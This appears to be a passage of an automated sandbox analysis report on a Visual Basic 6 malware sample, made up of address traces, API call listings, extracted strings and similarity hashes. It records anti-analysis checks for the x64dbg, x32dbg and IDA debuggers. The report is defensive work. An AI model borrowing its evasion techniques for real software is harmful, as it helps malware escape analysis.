						__imp____vbaAryUnlock( &_v188);
						__imp____vbaFreeVar();
					}
				}
			}

0x0fa4aa51
0x0fa4aa53
0x0fa4aa62
0x0fa4aa69
0x0fa4aa72
0x0fa4aa75
0x0fa4aa8b
0x0fa4aa8b
0x0fa4aa8d
0x0fa4aa90
0x0fa4aa93
0x0fa4aa96
0x0fa4aa99
0x0fa4aa9c
0x0fa4aa9f
0x0fa4aaa2
0x0fa4aaa8
0x0fa4aaae
0x0fa4aab4
0x0fa4aaba
0x0fa4aac0
0x0fa4aac6
0x0fa4aacc
0x0fa4aad2
0x0fa4aad8
0x0fa4aade
0x0fa4aae4
0x0fa4aaea
0x0fa4aaf0
0x0fa4aaf6
0x0fa4aafc
0x0fa4ab02
0x0fa4ab08
0x0fa4ab0e
0x0fa4ab14
0x0fa4ab1a
0x0fa4ab20
0x0fa4ab25
0x0fa4ab2a
0x0fa4ab2f
0x0fa4ab34
0x0fa4ab39
0x0fa4ab3e
0x0fa4ab43
0x0fa4ab48
0x0fa4ab4d
0x0fa4ab52
0x0fa4ab57
0x0fa4ab5e
0x0fa4ab6a
0x0fa4ab75
0x0fa4ab80
0x0fa4ab85
0x0fa4ab88
0x0fa4ba1f
0x0fa4ba1f
0x0fa4ba89
0x0fa4ba90
0x0fa4ba96
0x0fa4baa2
0x0fa4baa4
0x0fa4baad
0x0fa4bab2
0x0fa4bac1
0x0fa4bac6
0x0fa4bad4
0x0fa4bada
0x0fa4bada
0x0fa4ab8e
0x0fa4abac
0x0fa4abb4
0x0fa4abbe
0x0fa4abc4
0x0fa4abda
0x0fa4abe0
0x0fa4abe8
0x0fa4abf2
0x0fa4ac04
0x0fa4ac18
0x0fa4ac1f
0x0fa4ac30
0x0fa4ac45
0x0fa4ac4f
0x0fa4ac59
0x0fa4ac6e
0x0fa4ac70
0x0fa4ac88
0x0fa4ac96
0x0fa4ac9c
0x0fa4aca8
0x0fa4acb3
0x0fa4accc
0x0fa4acd4
0x0fa4acdc
0x0fa4ace3
0x0fa4acf3
0x0fa4acf6
0x0fa4acf8
0x0fa4ad01
0x00000000
0x00000000
0x0fa4ad1d
0x0fa4ad24
0x0fa4ad32
0x0fa4ad34
0x0fa4ad3d
0x0fa4ad43
0x0fa4ad48
0x0fa4ad4e
0x0fa4ad6c
0x0fa4ad50
0x0fa4ad53
0x0fa4ad63
0x0fa4ad55
0x0fa4ad58
0x0fa4ad5a
0x0fa4ad5a
0x0fa4ad58
0x0fa4ad53
0x0fa4ad7c
0x0fa4ad8d
0x0fa4ad8d
0x0fa4ad96
0x0fa4ae45
0x0fa4adb2
0x0fa4adc1
0x0fa4addc
0x0fa4ade4
0x0fa4adee
0x0fa4adf8
0x0fa4ae0e
0x0fa4ae10
0x0fa4ae2d
0x0fa4ae32
0x0fa4ae41
0x0fa4ae41
0x0fa4ae4f
0x0fa4ae72
0x0fa4ae8d
0x0fa4ae95
0x0fa4ae9f
0x0fa4aea9
0x0fa4aeb8
0x0fa4aec9
0x0fa4aecb
0x0fa4aee8
0x0fa4aef6
0x0fa4aef6
0x0fa4aefc
0x0fa4aefe
0x0fa4aefe
0x0fa4af07
0x0fa4af2a
0x0fa4af45
0x0fa4af4d
0x0fa4af57
0x0fa4af61
0x0fa4af70
0x0fa4af81
0x0fa4af83
0x0fa4afa0
0x0fa4afae
0x0fa4afae
0x0fa4afb8
0x0fa4afe3
0x0fa4affe
0x0fa4b006
0x0fa4b010
0x0fa4b01a
0x0fa4b029
0x0fa4b03a
0x0fa4b03c
0x0fa4b059
0x0fa4b067
0x0fa4b067
0x0fa4b06c
0x0fa4b071
0x0fa4b077
0x0fa4b07c
0x0fa4b082
0x0fa4b090
0x0fa4b0a5
0x0fa4b0c0
0x0fa4b0c8
0x0fa4b0d2
0x0fa4b0dc
0x0fa4b0eb
0x0fa4b0fc
0x0fa4b0fe
0x0fa4b11b
0x0fa4b129
0x0fa4b129
0x0fa4b090
0x0fa4b133
0x0fa4b15e
0x0fa4b179
0x0fa4b181
0x0fa4b18b
0x0fa4b195
0x0fa4b1a4
0x0fa4b1b5
0x0fa4b1b7
0x0fa4b1d4
0x0fa4b1e2
0x0fa4b1e2
0x0fa4b1ec
0x0fa4b20f
0x0fa4b22a
0x0fa4b232
0x0fa4b23c
0x0fa4b246
0x0fa4b255
0x0fa4b266
0x0fa4b268
0x0fa4b285
0x0fa4b293
0x0fa4b293
0x0fa4b29d
0x0fa4b2c0
0x0fa4b2db
0x0fa4b2e3
0x0fa4b2ed
0x0fa4b2f7
0x0fa4b30d
0x0fa4b30f
0x0fa4b32c
0x0fa4b33a
0x0fa4b33a
0x0fa4b342
0x0fa4b349
0x0fa4b34b
0x0fa4b351
0x0fa4b354
0x0fa4b369
0x0fa4b805
0x0fa4b80a
0x0fa4b80c
0x00000000
0x0fa4b80c
0x0fa4b37a
0x0fa4b394
0x0fa4b39e
0x0fa4b3a7
0x0fa4b3b1
0x0fa4b3b7
0x0fa4b3ba
0x0fa4b3bd
0x0fa4b3c4
0x0fa4b3ca
0x0fa4b3d0
0x0fa4b3d8
0x0fa4b3e2
0x0fa4b3eb
0x0fa4b3ee
0x0fa4b3fe
0x0fa4b40b
0x0fa4b411
0x0fa4b41a
0x0fa4b426
0x0fa4b45d
0x0fa4b46b
0x0fa4b483
0x0fa4b494
0x0fa4b4a1
0x0fa4b4b5
0x0fa4b4bb
0x0fa4b4df
0x0fa4b4e5
0x0fa4b4f0
0x0fa4b814
0x0fa4b82b
0x0fa4b835
0x0fa4b83b
0x0fa4b849
0x0fa4b853
0x0fa4b85d
0x0fa4b863
0x0fa4b87a
0x0fa4b88f
0x0fa4b898
0x00000000
0x0fa4b898
0x0fa4b50c
0x0fa4b518
0x0fa4b522
0x0fa4b53b
0x0fa4b54c
0x0fa4b558
0x0fa4b566
0x0fa4b572
0x0fa4b57e
0x0fa4b585
0x0fa4b594
0x0fa4b5a0
0x0fa4b5b6
0x0fa4b5ca
0x0fa4b5cc
0x0fa4b5cf
0x0fa4b5d2
0x0fa4b5d9
0x0fa4b5df
0x0fa4b5e5
0x0fa4b5ed
0x0fa4b5f7
0x0fa4b600
0x0fa4b603
0x0fa4b60f
0x0fa4b615
0x0fa4b61e
0x0fa4b62a
0x0fa4b666
0x0fa4b67c
0x0fa4b691
0x0fa4b69b
0x0fa4b6a5
0x0fa4b6ba
0x0fa4b6c7
0x0fa4b6d1
0x0fa4b6e6
0x0fa4b6f0
0x0fa4b6fc
0x0fa4b715
0x0fa4b71b
0x0fa4b743
0x0fa4b74c
0x0fa4b761
0x0fa4b767
0x0fa4b76d
0x0fa4b775
0x0fa4b7a0
0x0fa4b7a6
0x0fa4b7a8
0x0fa4b7ab
0x0fa4b7bd
0x0fa4b7c7
0x0fa4b7d1
0x0fa4b7d8
0x0fa4b7df
0x0fa4b7e6
0x0fa4b7ef
0x0fa4b8a2
0x0fa4b8b9
0x0fa4b8c3
0x0fa4b8c9
0x0fa4b8d7
0x0fa4b8e1
0x0fa4b8eb
0x0fa4b8f1
0x0fa4b908
0x0fa4b91d
0x0fa4b922
0x00000000
0x0fa4b922
0x0fa4b7fc
0x0fa4b802
0x00000000
0x0fa4b802
0x0fa4b92c
0x0fa4b935
0x0fa4b937
0x0fa4b95e
0x0fa4b962
0x0fa4b971
0x0fa4b977
0x0fa4b997
0x0fa4b99d
0x0fa4b9ba
0x0fa4b9c8
0x0fa4b9d9
0x0fa4b9ec
0x0fa4b9ec
0x0fa4b9f5
0x0fa4ba01
0x0fa4ba0d
0x0fa4ba19
0x0fa4ba19
0x0fa4b937

APIs

__vbaFreeVar.MSVBVM60(?), ref: 0FA4AB75
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000), ref: 0FA4ABAC
__vbaVarMove.MSVBVM60 ref: 0FA4ABE0
__vbaVarMove.MSVBVM60 ref: 0FA4AC18

Part of subcall function 0FA4AA30: #644.MSVBVM60(00000000,?,0FA4AC1F), ref: 0FA4AA3E

__vbaVarMove.MSVBVM60 ref: 0FA4AC45
__vbaVarMove.MSVBVM60 ref: 0FA4AC6E
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4AC96
#644.MSVBVM60(?), ref: 0FA4ACA6

Part of subcall function 0FA85D80: #644.MSVBVM60(0FA679AF,0FA679AF,?,?,0FA4ACB3), ref: 0FA85DA8

#644.MSVBVM60(?), ref: 0FA4ACC0
__vbaObjSetAddref.MSVBVM60(?,?,?,00000000,00000004), ref: 0FA4ACDC
#644.MSVBVM60(00000000), ref: 0FA4ACE3
__vbaFreeObj.MSVBVM60 ref: 0FA4ACF8
__vbaObjSetAddref.MSVBVM60(?,?,?,?), ref: 0FA4AD1D

Part of subcall function 0FA85DF0: __vbaObjSetAddref.MSVBVM60(?,0FA4AD29,00000001,72A46AEE,72A1C30A), ref: 0FA85E5C
Part of subcall function 0FA85DF0: __vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA85E83
Part of subcall function 0FA85DF0: __vbaObjSetAddref.MSVBVM60(?,?), ref: 0FA85E91
Part of subcall function 0FA85DF0: __vbaVarMove.MSVBVM60(?,00000000), ref: 0FA85EAF
Part of subcall function 0FA85DF0: __vbaFreeObj.MSVBVM60 ref: 0FA85EB4
Part of subcall function 0FA85DF0: __vbaFreeVar.MSVBVM60 ref: 0FA85EBD
Part of subcall function 0FA85DF0: __vbaObjSetAddref.MSVBVM60(?,?), ref: 0FA85ECB
Part of subcall function 0FA85DF0: __vbaVarMove.MSVBVM60(?,00000000), ref: 0FA85EE3
Part of subcall function 0FA85DF0: __vbaFreeObj.MSVBVM60 ref: 0FA85EE8
Part of subcall function 0FA85DF0: __vbaFreeVar.MSVBVM60 ref: 0FA85EF1

__vbaFreeObj.MSVBVM60(00000000), ref: 0FA4AD34
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000,?,00000040,?,00000000,00000000,00000000,000000FF), ref: 0FA4ADDC
__vbaVarMove.MSVBVM60 ref: 0FA4AE0E
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4AE41
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000,?,00000040,?), ref: 0FA4AE8D
__vbaVarMove.MSVBVM60 ref: 0FA4AEC9
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4AEF6
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000,?,00000040,?), ref: 0FA4AF45
__vbaVarMove.MSVBVM60 ref: 0FA4AF81
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4AFAE
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000,?,00000040,?,000000FF,00000000,00000000,00000000), ref: 0FA4AFFE
__vbaVarMove.MSVBVM60 ref: 0FA4B03A
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4B067
__vbaSetSystemError.MSVBVM60 ref: 0FA4B082
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000,?,00000040,?), ref: 0FA4B0C0
__vbaVarMove.MSVBVM60 ref: 0FA4B0FC
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4B129
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000,?,00000040,?,00000000,00000000,000000FF,00000000), ref: 0FA4B179
__vbaVarMove.MSVBVM60 ref: 0FA4B1B5
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4B1E2
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000,?,00000040,?), ref: 0FA4B22A
__vbaVarMove.MSVBVM60 ref: 0FA4B266
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4B293
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000,?,00000040,?), ref: 0FA4B2DB
__vbaVarMove.MSVBVM60 ref: 0FA4B30D
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4B33A
__vbaAryLock.MSVBVM60(?,?), ref: 0FA4B37A
__vbaVarCopy.MSVBVM60 ref: 0FA4B3B1
__vbaAryLock.MSVBVM60(?,?,?), ref: 0FA4B3FE

Part of subcall function 0FA49BC0: #644.MSVBVM60(x64dbg,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C0B
Part of subcall function 0FA49BC0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C10
Part of subcall function 0FA49BC0: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C22
Part of subcall function 0FA49BC0: #644.MSVBVM60(x32dbg,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C41
Part of subcall function 0FA49BC0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C47
Part of subcall function 0FA49BC0: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C56
Part of subcall function 0FA49BC0: #644.MSVBVM60(IDA,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C75
Part of subcall function 0FA49BC0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C7B
Part of subcall function 0FA49BC0: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C8A
Part of subcall function 0FA49BC0: __vbaStrCat.MSVBVM60(0FA35EA4,0FA35E9C,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CB4
Part of subcall function 0FA49BC0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CC1
Part of subcall function 0FA49BC0: __vbaStrCat.MSVBVM60(0FA35EAC,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CC9
Part of subcall function 0FA49BC0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CD0
Part of subcall function 0FA49BC0: __vbaStrCat.MSVBVM60(0FA35EB4,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CD8
Part of subcall function 0FA49BC0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CDF

__vbaVarCat.MSVBVM60(?,?,?), ref: 0FA4B438
__vbaVarCat.MSVBVM60(?,?,00000000), ref: 0FA4B449
__vbaVarCat.MSVBVM60(?,?,00000000), ref: 0FA4B45A
__vbaStrVarMove.MSVBVM60(00000000), ref: 0FA4B45D
__vbaStrMove.MSVBVM60 ref: 0FA4B46B
__vbaAryUnlock.MSVBVM60(?,?,0FA33006), ref: 0FA4B4A1
__vbaFreeStr.MSVBVM60 ref: 0FA4B4BB
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0FA4B4DF
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000005,00000000), ref: 0FA4B50C
__vbaVarMove.MSVBVM60 ref: 0FA4B54C
__vbaStrCat.MSVBVM60(0FA35FA0,0FA35F18), ref: 0FA4B558
__vbaStrMove.MSVBVM60 ref: 0FA4B566
__vbaVarMove.MSVBVM60(?), ref: 0FA4B5CA

Part of subcall function 0FA4C960: __vbaVarDup.MSVBVM60(?,72A46AEE,72A2697D), ref: 0FA4C9D0
Part of subcall function 0FA4C960: __vbaVarDup.MSVBVM60 ref: 0FA4C9EF
Part of subcall function 0FA4C960: #607.MSVBVM60(?,00000104,?), ref: 0FA4CA01
Part of subcall function 0FA4C960: __vbaVarMove.MSVBVM60 ref: 0FA4CA16
Part of subcall function 0FA4C960: __vbaFreeVar.MSVBVM60 ref: 0FA4CA1B
Part of subcall function 0FA4C960: __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000002,00000000), ref: 0FA4CA35
Part of subcall function 0FA4C960: __vbaVarMove.MSVBVM60(?), ref: 0FA4CA7B
Part of subcall function 0FA4C960: __vbaVarMove.MSVBVM60(?), ref: 0FA4CAB8
Part of subcall function 0FA4C960: __vbaVarMove.MSVBVM60 ref: 0FA4CAE8

__vbaVarCat.MSVBVM60(?,?,?,?), ref: 0FA4B63C
__vbaVarCat.MSVBVM60(?,?,00000000), ref: 0FA4B64D
__vbaVarCat.MSVBVM60(?,?,00000000), ref: 0FA4B65E

Part of subcall function 0FA4BF90: __vbaVarVargNofree.MSVBVM60(72A1A008,00000000,72A46AEE,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFC7
Part of subcall function 0FA4BF90: __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD2
Part of subcall function 0FA4BF90: #644.MSVBVM60(00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD9
Part of subcall function 0FA4BF90: __vbaFreeStr.MSVBVM60(?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFE5

__vbaVarMove.MSVBVM60(00000000), ref: 0FA4B691
__vbaVarMove.MSVBVM60 ref: 0FA4B6BA
__vbaVarMove.MSVBVM60 ref: 0FA4B6E6
__vbaVarZero.MSVBVM60 ref: 0FA4B715
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4B74C
__vbaVarMove.MSVBVM60 ref: 0FA4B76D
__vbaFreeStr.MSVBVM60 ref: 0FA4B775
__vbaFreeVarList.MSVBVM60(00000005,00000008,?,?,?,?), ref: 0FA4B7A6
__vbaVarCmpGt.MSVBVM60(00000008,00000008,?), ref: 0FA4B7D1
__vbaVarNot.MSVBVM60(?,00000000), ref: 0FA4B7DF
__vbaBoolVarNull.MSVBVM60(00000000), ref: 0FA4B7E6
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4B7FC
__vbaVarDup.MSVBVM60 ref: 0FA4B83B
__vbaVarDup.MSVBVM60 ref: 0FA4B863
__vbaStrCat.MSVBVM60(0FA35FA8,00000000), ref: 0FA4B572

Part of subcall function 0FA4BE20: #595.MSVBVM60(00000010,?,00000010,?,?,00000008,72A46DF6,72A2697D), ref: 0FA4BE75
Part of subcall function 0FA4BE20: __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0FA4BE88

__vbaFreeVarList.MSVBVM60(00000002,?,?,?,00000010,?), ref: 0FA4B88F
__vbaVarDup.MSVBVM60 ref: 0FA4B8C9
__vbaVarDup.MSVBVM60 ref: 0FA4B8F1
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,00000008,00000010,?), ref: 0FA4B91D
__vbaAryUnlock.MSVBVM60(?,0FA4BADB), ref: 0FA4BA90
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0FA4BAA2
__vbaFreeVar.MSVBVM60 ref: 0FA4BAAD
__vbaFreeObj.MSVBVM60 ref: 0FA4BAB2
__vbaAryDestruct.MSVBVM60(0FA35A80,?), ref: 0FA4BAC1
__vbaFreeVar.MSVBVM60 ref: 0FA4BAC6
__vbaRecDestruct.MSVBVM60(0FA35A60,?), ref: 0FA4BAD4

Strings

Can't run file!, xrefs: 0FA4B8E1
Error, xrefs: 0FA4B82B, 0FA4B8B9
Can't save data to file!, xrefs: 0FA4B853
@, xrefs: 0FA4AD6C
", xrefs: 0FA4ABE8
@, xrefs: 0FA4AF03
, xrefs: 0FA4B7BD

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Move$Free$#644$Redim$Erase$AddrefList$ErrorSystem$DestructUnlock$Lock$#595#607BoolCheckCopyHresultNofreeNullVargZero
String ID: $"$@$@$Can't run file!$Can't save data to file!$Error
API String ID: 473023984-3921469335
Opcode ID: 92e433f1ce59e85664e9f0d0efed046f7d553a3dba5ceace60a484b2bd84a63e
Instruction ID: 37e32f45fd31760748e42748354bb693d00eea099a40a9743ddd4ea8d6de588c
Opcode Fuzzy Hash: 92e433f1ce59e85664e9f0d0efed046f7d553a3dba5ceace60a484b2bd84a63e
Instruction Fuzzy Hash: 7FA20B719002199FDB28DF68CD95FE9B7B5FF88704F0081D9E109AB281DB74AA85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0FA85DF0 Relevance: 146.4, APIs: 97, Instructions: 915
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaObjSetAddref.MSVBVM60(?,0FA4AD29,00000001,72A46AEE,72A1C30A), ref: 0FA85E5C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA85E83
__vbaObjSetAddref.MSVBVM60(?,?), ref: 0FA85E91
__vbaVarMove.MSVBVM60(?,00000000), ref: 0FA85EAF
__vbaFreeObj.MSVBVM60 ref: 0FA85EB4
__vbaFreeVar.MSVBVM60 ref: 0FA85EBD
__vbaObjSetAddref.MSVBVM60(?,?), ref: 0FA85ECB
__vbaVarMove.MSVBVM60(?,00000000), ref: 0FA85EE3
__vbaFreeObj.MSVBVM60 ref: 0FA85EE8
__vbaFreeVar.MSVBVM60 ref: 0FA85EF1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA85F28
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA85F5F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA85F8A
__vbaObjSetAddref.MSVBVM60(?,?), ref: 0FA85F98
__vbaVarMove.MSVBVM60(00000000), ref: 0FA85FB0
__vbaFreeObj.MSVBVM60 ref: 0FA85FB5
__vbaFreeVar.MSVBVM60 ref: 0FA85FBE
__vbaObjSetAddref.MSVBVM60(?,?), ref: 0FA85FCC

Part of subcall function 0FA4D110: __vbaObjSetAddref.MSVBVM60(?,0FA85FA0,72A1A008,0FA32FF6,72A46AEE,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4D152
Part of subcall function 0FA4D110: __vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6,0FA85FA0), ref: 0FA4D17D
Part of subcall function 0FA4D110: __vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA4D1F4
Part of subcall function 0FA4D110: __vbaStrCopy.MSVBVM60 ref: 0FA4D203
Part of subcall function 0FA4D110: __vbaFreeObj.MSVBVM60(0FA4D224,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6,0FA85FA0), ref: 0FA4D21D

__vbaVarMove.MSVBVM60(00000000), ref: 0FA85FE4
__vbaFreeObj.MSVBVM60 ref: 0FA85FE9
__vbaFreeVar.MSVBVM60 ref: 0FA85FF2
__vbaObjSetAddref.MSVBVM60(?,?), ref: 0FA86000
__vbaVarMove.MSVBVM60(00000000), ref: 0FA86018
__vbaFreeObj.MSVBVM60 ref: 0FA8601D
__vbaFreeVar.MSVBVM60 ref: 0FA86026
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA86057
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA86086
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA860B3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA860E0
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000), ref: 0FA86103
__vbaAryLock.MSVBVM60(?,?), ref: 0FA86110
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA86149
__vbaAryUnlock.MSVBVM60(?), ref: 0FA8614F
__vbaStrErrVarCopy.MSVBVM60(?), ref: 0FA86167
__vbaFreeStr.MSVBVM60(?,?,000000FF), ref: 0FA8618F
__vbaStrMove.MSVBVM60 ref: 0FA86172

Part of subcall function 0FA4C020: __vbaVarCopy.MSVBVM60(?,?,72A1C6D9,?), ref: 0FA4C0B0
Part of subcall function 0FA4C020: __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000004,00000000), ref: 0FA4C0DD
Part of subcall function 0FA4C020: __vbaVarZero.MSVBVM60 ref: 0FA4C102
Part of subcall function 0FA4C020: __vbaVarMove.MSVBVM60 ref: 0FA4C132
Part of subcall function 0FA4C020: __vbaVarMove.MSVBVM60 ref: 0FA4C14E
Part of subcall function 0FA4C020: __vbaVarMove.MSVBVM60 ref: 0FA4C177

__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA861E2
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000), ref: 0FA86216
__vbaAryLock.MSVBVM60(?,?), ref: 0FA86229
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA8625E
__vbaAryUnlock.MSVBVM60(?), ref: 0FA86268
__vbaStrErrVarCopy.MSVBVM60(?), ref: 0FA8627A
__vbaStrMove.MSVBVM60 ref: 0FA86285
__vbaFreeStr.MSVBVM60(?,?,000000FF), ref: 0FA862A2
__vbaAryLock.MSVBVM60(?,?), ref: 0FA862D6
#644.MSVBVM60(0FA32FF6), ref: 0FA862EA
#644.MSVBVM60(?,?,?,?), ref: 0FA8631F
#644.MSVBVM60(?), ref: 0FA86327
__vbaAryLock.MSVBVM60(?,?), ref: 0FA86340
#644.MSVBVM60(0FA32FF6), ref: 0FA86352
__vbaAryUnlock.MSVBVM60(?), ref: 0FA8635B
__vbaAryUnlock.MSVBVM60(?), ref: 0FA862F3

Part of subcall function 0FA85AE0: RtlFillMemory.KERNEL32 ref: 0FA85B00
Part of subcall function 0FA85AE0: #644.MSVBVM60(?), ref: 0FA85B11
Part of subcall function 0FA85AE0: #644.MSVBVM60(00000000,00000000,00000008), ref: 0FA85B26
Part of subcall function 0FA85AE0: #644.MSVBVM60(00000016,00000000,00000004), ref: 0FA85B43

#644.MSVBVM60(?,?,?,?), ref: 0FA86387
#644.MSVBVM60(?), ref: 0FA8638F
__vbaRedim.MSVBVM60(00000000,00000014,00000000,0FA35A80,00000001,72A1DE98,00000000,00000000,00000000), ref: 0FA863B9
__vbaAryLock.MSVBVM60(?,?,00000000,00000000), ref: 0FA863E6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C,?,?,00000000,00000000), ref: 0FA8643A
#526.MSVBVM60(00000008,00000000,?,?,00000000,00000000), ref: 0FA86453
__vbaStrVarMove.MSVBVM60(00000008,?,?,00000000,00000000), ref: 0FA8645D
__vbaStrMove.MSVBVM60(?,?,00000000,00000000), ref: 0FA8646E
__vbaStrCopy.MSVBVM60(?,?,00000000,00000000), ref: 0FA86474
__vbaFreeStr.MSVBVM60(?,?,00000000,00000000), ref: 0FA8647D
__vbaFreeVar.MSVBVM60(?,?,00000000,00000000), ref: 0FA86486
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C,?,?,00000000,00000000), ref: 0FA864CC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C,?,?,00000000,00000000), ref: 0FA864FD
#526.MSVBVM60(00000008,00000000,?,?,00000000,00000000), ref: 0FA86515
__vbaStrVarMove.MSVBVM60(00000008,?,?,00000000,00000000), ref: 0FA86522
__vbaStrMove.MSVBVM60(?,?,00000000,00000000), ref: 0FA8652D
__vbaStrCopy.MSVBVM60(?,?,00000000,00000000), ref: 0FA86533
__vbaFreeStr.MSVBVM60(?,?,00000000,00000000), ref: 0FA8653C
__vbaFreeVar.MSVBVM60(?,?,00000000,00000000), ref: 0FA86545
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C,?,?,00000000,00000000), ref: 0FA8658B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C,?,?,00000000,00000000), ref: 0FA865BC
#526.MSVBVM60(00000008,00000000,?,?,00000000,00000000), ref: 0FA865D4
__vbaStrVarMove.MSVBVM60(00000008,?,?,00000000,00000000), ref: 0FA865E1
__vbaStrMove.MSVBVM60(?,?,00000000,00000000), ref: 0FA865EC
__vbaStrCopy.MSVBVM60(?,?,00000000,00000000), ref: 0FA865F2
__vbaFreeStr.MSVBVM60(?,?,00000000,00000000), ref: 0FA865FB
__vbaFreeVar.MSVBVM60(?,?,00000000,00000000), ref: 0FA86604
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C,?,?,00000000,00000000), ref: 0FA86650
